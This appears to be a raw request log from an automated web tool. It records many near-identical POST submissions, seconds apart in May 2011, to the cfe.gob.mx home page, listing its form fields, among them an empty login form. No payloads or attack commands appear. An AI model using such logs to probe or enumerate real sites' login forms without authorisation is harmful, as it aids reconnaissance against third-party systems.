__REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="/SearchCen...", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="Este sitio", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSAL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0x986D38B9...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="Este sitio", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="1", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="1", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="1", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="/SearchCen...", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="1", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="/SearchCen...", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="1", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="Este sitio", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="1", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="Este sitio", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="32", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="32", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="32", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="/SearchCen...", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="32", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="/SearchCen...", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:05 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="32", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="Este sitio", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:06 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="32", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="Este sitio", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:06 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:06 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:06 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="/SearchCen...", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
[Tue 24 May 2011 11:34:06 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="/SearchCen...", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$RememberMe="")
[Tue 24 May 2011 11:34:06 PM CDT] - http://www.cfe.gob.mx/Paginas/Home.aspx | Method: POST | Parameters: (ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$Password="", MSOSPWebPartManager_StartWebPartEditingName="false", __EVENTVALIDATION="/wEWSQL6k4...", MSOAuthoringConsole_FormContext="", MSOTlPn_SelectedWpId="", __EVENTARGUMENT="", MSOLayout_InDesignMode="", ctl00$m$g_ecf321fd_0095_4575_a382_61939a04a28f$ctl00="62", MSOGallery_SelectedLibrary="", MSOLayout_LayoutChanges="", MSOTlPn_View="0", MSOGallery_FilterString="", MSOAC_EditDuringWorkflow="", MSOTlPn_ShowSettings="False", __LASTFOCUS="", __SPSCEditMenu="true", ctl00_m_g_0e55e77d_1fa2_4c41_a275_b03e0c60aa77_SBD08AAFC_InputKeywords="", MSOWebPartPage_PostbackSource="", ctl00$m$g_39917842_c7a5_4a40_b214_e3e9b4d4137c$ctl00$RecibosLogin$UserName="", __EVENTTARGET="", MSOTlPn_Button="none", MSOSPWebPartManager_DisplayModeName="Browse", ctl00$PlaceHolderSearchArea$ctl01$S6AE27B38_InputKeywords="", __VIEWSTATE="/wEPDwULLT...", __REQUESTDIGEST="0xC26CE8BB...", ctl00$PlaceHolderSearchArea$ctl01$ctl00="http://www...", ctl00$PlaceHolderSearchArea$ctl01$SBScopesDDL="Este sitio", MSOWebPartPage_Shared="", MSOSPWebPartManager_OldDisplayModeName="Browse")
